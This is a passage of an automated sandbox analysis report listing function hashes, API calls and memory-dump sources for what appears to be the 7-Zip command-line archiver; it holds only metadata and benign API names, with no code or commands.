                                              • Opcode ID: 3a6e4a3181c93a834bb00232bbe3cd1be3278f9ec7f472aa7c7a9102a42470ae
                                              • Instruction ID: ea267ac24c258f1fe0784535dd9cdad83d6cb69aed942d11cd1b05ad12e6a042
                                              • Opcode Fuzzy Hash: 3a6e4a3181c93a834bb00232bbe3cd1be3278f9ec7f472aa7c7a9102a42470ae
                                              • Instruction Fuzzy Hash: CAE0C2372092206F961A6B48BC018543BD5EBCA371329002FEB40E7360EFA33C156AB8
                                              APIs
                                              • SysAllocStringLen.OLEAUT32(?,?), ref: 00CF952C
                                              • _CxxThrowException.MSVCRT(?,00DA55B8), ref: 00CF954A
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: AllocExceptionStringThrow
                                              • String ID:
                                              • API String ID: 3773818493-0
                                              • Opcode ID: 6e86d25ede6a461b8987b217918881e6e348ba6bcf550ec78aeae1164e9aef29
                                              • Instruction ID: 673c5c41824a884aa492f1d608994704a3e8ee8d45f5b1f46ca1e284a4429375
                                              • Opcode Fuzzy Hash: 6e86d25ede6a461b8987b217918881e6e348ba6bcf550ec78aeae1164e9aef29
                                              • Instruction Fuzzy Hash: 94F06D72620308AFCB54EFA8D855E967BECEF05780740852AF908CB310E770E80087A0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: ErrorLast_beginthreadex
                                              • String ID:
                                              • API String ID: 4034172046-0
                                              • Opcode ID: 9d1a82d5887218a80ecc22d91f49999dcd9b5cb194540508369112c61042f6f8
                                              • Instruction ID: a28e2fca6a7306b0d6cb8fde670e706ee701d2c399ce5ac9c565662c947dc989
                                              • Opcode Fuzzy Hash: 9d1a82d5887218a80ecc22d91f49999dcd9b5cb194540508369112c61042f6f8
                                              • Instruction Fuzzy Hash: B2E0C2B22083026BF310AB60CC42F77729CEBA0B40F58847DFA49C7180E660CD00C7B1
                                              APIs
                                              • GetCurrentProcess.KERNEL32(?,?,00CF9C6E), ref: 00CF9C52
                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00CF9C59
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                               • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: Process$AffinityCurrentMask
                                              • String ID:
                                              • API String ID: 1231390398-0
                                              • Opcode ID: 77ee9214c41cdac08a57b1ee2a84f503c5ee65e4817829d8617c0766c95012d2
                                              • Instruction ID: 0fbd530629dc27f23062036b825a5de33b7d958f09f4aa07e19106ed72b9880d
                                              • Opcode Fuzzy Hash: 77ee9214c41cdac08a57b1ee2a84f503c5ee65e4817829d8617c0766c95012d2
                                              • Instruction Fuzzy Hash: D5B012B2460300FFCF00ABB0DD0DC163B2CEA043017005746F10DC2110D636C045CB70
                                              APIs
                                              • memcpy.MSVCRT(?,00000000,00000000,00000000,00040000,?), ref: 00CFB843
                                              • GetLastError.KERNEL32 ref: 00CFB8AA
                                              Similarity
                                              • API ID: ErrorLastmemcpy
                                              • String ID:
                                              • API String ID: 2523627151-0
                                              APIs
                                              Similarity
                                              • API ID: ExceptionThrowmalloc
                                              • String ID:
                                              • API String ID: 2436765578-0
                                              APIs
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              APIs
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              APIs
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D3CF96
                                                • Part of subcall function 00D41511: __EH_prolog.LIBCMT ref: 00D41516
                                                • Part of subcall function 00D41511: _CxxThrowException.MSVCRT(?,00DAD480), ref: 00D41561
                                              Similarity
                                              • API ID: H_prolog$ExceptionThrow
                                              • String ID:
                                              • API String ID: 2366012087-0
                                              APIs
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              APIs
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D04255
                                                • Part of subcall function 00D0440B: __EH_prolog.LIBCMT ref: 00D04410
                                                • Part of subcall function 00CF1E0C: malloc.MSVCRT ref: 00CF1E1F
                                                • Part of subcall function 00CF1E0C: _CxxThrowException.MSVCRT(?,00DA4B28), ref: 00CF1E39
                                              Similarity
                                              • API ID: H_prolog$ExceptionThrowmalloc
                                              • String ID:
                                              • API String ID: 3744649731-0
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D1D0E6
                                                • Part of subcall function 00CF1E0C: malloc.MSVCRT ref: 00CF1E1F
                                                • Part of subcall function 00CF1E0C: _CxxThrowException.MSVCRT(?,00DA4B28), ref: 00CF1E39
                                              Similarity
                                              • API ID: ExceptionH_prologThrowmalloc
                                              • String ID:
                                              • API String ID: 3978722251-0
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D07FCA
                                                • Part of subcall function 00CF950D: SysAllocStringLen.OLEAUT32(?,?), ref: 00CF952C
                                                • Part of subcall function 00CF950D: _CxxThrowException.MSVCRT(?,00DA55B8), ref: 00CF954A
                                              Similarity
                                              • API ID: AllocExceptionH_prologStringThrow
                                              • String ID:
                                              • API String ID: 1940201546-0
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D2ADBC
                                                • Part of subcall function 00D2AD29: __EH_prolog.LIBCMT ref: 00D2AD2E
                                                • Part of subcall function 00D2AF2D: __EH_prolog.LIBCMT ref: 00D2AF32
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              APIs
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D198F7
                                                • Part of subcall function 00D19987: __EH_prolog.LIBCMT ref: 00D1998C
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D1021F
                                                • Part of subcall function 00D03D66: __EH_prolog.LIBCMT ref: 00D03D6B
                                                • Part of subcall function 00D03D66: GetCurrentProcess.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00D03D7D
                                                • Part of subcall function 00D03D66: OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00D03D94
                                                • Part of subcall function 00D03D66: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00D03DB6
                                                • Part of subcall function 00D03D66: AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,759A8E30), ref: 00D03DCB
                                                • Part of subcall function 00D03D66: GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,759A8E30), ref: 00D03DD5
                                              Similarity
                                              • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                              • String ID:
                                              • API String ID: 1532160333-0
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D11C74
                                                • Part of subcall function 00CF6C72: __EH_prolog.LIBCMT ref: 00CF6C77
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 07da24969d9a1bebac50a2f15cd1dc3ab94ec0d1f3f2462f4a1b3f5ac0efb4be
                                              • Instruction ID: 048285cbfb4712e09ae8970f5abf43d28b8dab4041cae9a0e77c38bcb6344591
                                              • Opcode Fuzzy Hash: 07da24969d9a1bebac50a2f15cd1dc3ab94ec0d1f3f2462f4a1b3f5ac0efb4be
                                              • Instruction Fuzzy Hash: 1111AD35900208ABCF19FBE4E952BFEBB76AF04354F040029EA4263292DF715D89D6A1
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D07E5F
                                                • Part of subcall function 00CF6C72: __EH_prolog.LIBCMT ref: 00CF6C77
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                                • Part of subcall function 00CF757D: GetLastError.KERNEL32(00CFD14C), ref: 00CF757D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$ErrorLastfree
                                              • String ID:
                                              • API String ID: 683690243-0
                                              • Opcode ID: 92f9035cc0fc536353fb630b69db06036f5c4748d2d0daa1bfe54730782d4f6d
                                              • Instruction ID: 8be696b844d7f8b67946bd24ed8cc53fff89c63cb35fa9bece657e20419b113f
                                              • Opcode Fuzzy Hash: 92f9035cc0fc536353fb630b69db06036f5c4748d2d0daa1bfe54730782d4f6d
                                              • Instruction Fuzzy Hash: D9010432A457049FC721EF74D492AEEBBB1EF45310B00462EE98353692CB34A909DB61
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D3BF91
                                                • Part of subcall function 00D3D144: __EH_prolog.LIBCMT ref: 00D3D149
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$free
                                              • String ID:
                                              • API String ID: 2654054672-0
                                              • Opcode ID: e1312684d9da2aba6ee1288cc249312caf499f498c7e07e7aec56c04e7a3b7bc
                                              • Instruction ID: be722ef1005a211283e230bb2e6405c47e4b1030f21bdcaaae492e608ba62473
                                              • Opcode Fuzzy Hash: e1312684d9da2aba6ee1288cc249312caf499f498c7e07e7aec56c04e7a3b7bc
                                              • Instruction Fuzzy Hash: C7117075510754DFCB24EF64D905BDABBF4FF01344F00492CE4A6A3691DBB1AA04DBA0
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D3BDBA
                                                • Part of subcall function 00D3BE69: __EH_prolog.LIBCMT ref: 00D3BE6E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 8fcf55069d1fa320adc469291e2340c42ee446ad09f1736e49a4db4d554134bc
                                              • Instruction ID: 3cba7f19308edd6b932c41c753998ab6163cd2fc767cb16f52afbd973f660e9a
                                              • Opcode Fuzzy Hash: 8fcf55069d1fa320adc469291e2340c42ee446ad09f1736e49a4db4d554134bc
                                              • Instruction Fuzzy Hash: 0611E3B5901B84CFC720DF69C588686FBE4FF19304F54C9AED0AA97712D7B0A948CB61
                                              APIs
                                              • SetFileTime.KERNEL32(00000002,00000000,000000FF,00000000,00000000,80000000,00000000,?,00CF1AD1,00000000,00000002,00000002,?,00CF7B3E,?,00000000), ref: 00CF7AFD
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: FileTime
                                              • String ID:
                                              • API String ID: 1425588814-0
                                              • Opcode ID: e3d423b5f6997cf71431441b6b1584de45224ca5d61cfae489f03b38662b3b94
                                              • Instruction ID: 314aec0afe15be9d3e2536dd896a69a9dfe6b40e00845bb46de543768d467a84
                                              • Opcode Fuzzy Hash: e3d423b5f6997cf71431441b6b1584de45224ca5d61cfae489f03b38662b3b94
                                              • Instruction Fuzzy Hash: B201A230104248BFDF268F54CC09BFE3FA59B05320F14824DBAA5962E1C6B09F50E765
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D2C0B8
                                                • Part of subcall function 00D17193: __EH_prolog.LIBCMT ref: 00D17198
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$free
                                              • String ID:
                                              • API String ID: 2654054672-0
                                              • Opcode ID: 04ba0d7271253c4a0fa380dd347019618b8a226edd5184ad0499e0262e74ab98
                                              • Instruction ID: 36c0c15e64467db4888c2b70fdd33c0a5f30b08f6dc726715009a23a841e9e2c
                                              • Opcode Fuzzy Hash: 04ba0d7271253c4a0fa380dd347019618b8a226edd5184ad0499e0262e74ab98
                                              • Instruction Fuzzy Hash: 09F0E972A10325DBD7259F49E9417AEF3A9EF64764F14102FE51197711CFB2DC4086B0
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D30364
                                                • Part of subcall function 00D301C4: __EH_prolog.LIBCMT ref: 00D301C9
                                                • Part of subcall function 00D30143: __EH_prolog.LIBCMT ref: 00D30148
                                                • Part of subcall function 00CF1E40: free.MSVCRT ref: 00CF1E44
                                                • Part of subcall function 00D303D8: __EH_prolog.LIBCMT ref: 00D303DD
                                                • Part of subcall function 00D3004A: __EH_prolog.LIBCMT ref: 00D3004F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$free
                                              • String ID:
                                              • API String ID: 2654054672-0
                                              • Opcode ID: d76be237c3bb4c501459623f289879d0e06fd163ce349eb2d3480f1a54aa5427
                                              • Instruction ID: 6517293031fb4e70a622519d0591f350e078bd5483f737894d3840dd6a8342e4
                                              • Opcode Fuzzy Hash: d76be237c3bb4c501459623f289879d0e06fd163ce349eb2d3480f1a54aa5427
                                              • Instruction Fuzzy Hash: D8F0F434914B54DBCB19FB68C4263ADBBE4EF00314F10465DE452632D2CBB46B049775
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: ba7128bdb510e041b0274c3baf2a41de5ff8ddde47a3e17cddc7e07273b42514
                                              • Instruction ID: 41178882e49fd8a3ee80df322a7ebfc77ef4912979e803df5e81a52af3be6327
                                              • Opcode Fuzzy Hash: ba7128bdb510e041b0274c3baf2a41de5ff8ddde47a3e17cddc7e07273b42514
                                              • Instruction Fuzzy Hash: 7EF0AF32E1102AABCB00EF98D8509AFBB75FF54750B00805AF415E7251CB348A05DBA0
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D3550A
                                                • Part of subcall function 00D34E8A: __EH_prolog.LIBCMT ref: 00D34E8F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 6142241083ecb0592c8970b82e6b9b152e3d7036045300889022273061631659
                                              • Instruction ID: e810003a7ba97041a9ac9391983e7310cfb9eb65925704077925bed981884c68
                                              • Opcode Fuzzy Hash: 6142241083ecb0592c8970b82e6b9b152e3d7036045300889022273061631659
                                              • Instruction Fuzzy Hash: 49F06D76600914EBCB019F48E811B9EBBBAFF85760F10442AF411A7201DB75ED009BB0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: e43ecd869952e8496fbc797d14a516e410ba48513ce3b739c52ba8b91003ab4f
                                              • Instruction ID: 45d8a1dc526214ce9ea041b5b7c798f6910400e34e61c779d9e74e2484f408b7
                                              • Opcode Fuzzy Hash: e43ecd869952e8496fbc797d14a516e410ba48513ce3b739c52ba8b91003ab4f
                                              • Instruction Fuzzy Hash: F5E0ED75610104AFC714EF98D855F9EBBA8FF49354F10845AB44A97241C775E940CB74
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D35E30
                                                • Part of subcall function 00D308B6: __aulldiv.LIBCMT ref: 00D3093F
                                                • Part of subcall function 00D0DFC9: __EH_prolog.LIBCMT ref: 00D0DFCE
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog$__aulldiv
                                              • String ID:
                                              • API String ID: 604474441-0
                                              • Opcode ID: 8401f3b3db6bbf0e4d10cff3e2d7355d7327f2818ecbf2375ee257cafba7ea90
                                              • Instruction ID: 90e1ad9016f4beb2f01cd45792de15c9f1ccef6d94528a8524d4c135a158cc28
                                              • Opcode Fuzzy Hash: 8401f3b3db6bbf0e4d10cff3e2d7355d7327f2818ecbf2375ee257cafba7ea90
                                              • Instruction Fuzzy Hash: 04E0C971A11754DFCB55EFA8955169EBAE4FF08700F00596FA046D3B41DAB4A9008BA0
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D38ED6
                                                • Part of subcall function 00D39267: __EH_prolog.LIBCMT ref: 00D3926C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 33d0c1b576aa598f0cea5d8b16936ba503c0aac1c6ee2d8065df97ce3f0d5ca0
                                              • Instruction ID: 11dc515ff276b1349d15768a881bdbd19c263465e9df9996cd3ff6d33cacbe8e
                                              • Opcode Fuzzy Hash: 33d0c1b576aa598f0cea5d8b16936ba503c0aac1c6ee2d8065df97ce3f0d5ca0
                                              • Instruction Fuzzy Hash: ACE092719209209ACB09EB64E522BDDF7A8EF05704F40065DA04392682CBF46604C7B5
                                              APIs
                                              • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00CF7C8B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID:
                                              • API String ID: 3934441357-0
                                              • Opcode ID: 0b93320f1c2850d07e9eb679e64fce334c2b6072906dae90f0da2ee40438cf7e
                                              • Instruction ID: 5443889e57178400c721de8d662a3a9c3108aace7a25b2befb7039e2d4f7e680
                                              • Opcode Fuzzy Hash: 0b93320f1c2850d07e9eb679e64fce334c2b6072906dae90f0da2ee40438cf7e
                                              • Instruction Fuzzy Hash: 20E01A75600309FBCF11CFA5D801B8E7BB9EB09754F20C16AF919AA260D73ADA50DF54
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00D3BE6E
                                                • Part of subcall function 00D35E2B: __EH_prolog.LIBCMT ref: 00D35E30
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790973332.0000000000DB2000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790992823.0000000000DBB000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_cf0000_7zr.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 15570f66e65106924c7c8232f430acd594eb85b94fe47d78d55852bf54cc8593
                                              • Instruction ID: 21db611a3e4981ba22c3c9b99710b6710d9e4652397f7b8d4fbfd17759c21f70
                                              • Opcode Fuzzy Hash: 15570f66e65106924c7c8232f430acd594eb85b94fe47d78d55852bf54cc8593
                                              • Instruction Fuzzy Hash: 65E09271A24A608BD715FB24C011BDDB7A8FB00704F00845EE096D32C2CFB46A04C7B1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.1790815601.0000000000CF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00CF0000, based on PE: true
                                              • Associated: 0000000A.00000002.1790798004.0000000000CF0000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 0000000A.00000002.1790947719.0000000000D9C000.00000002.00000001.01000000.0000000A.sdmp
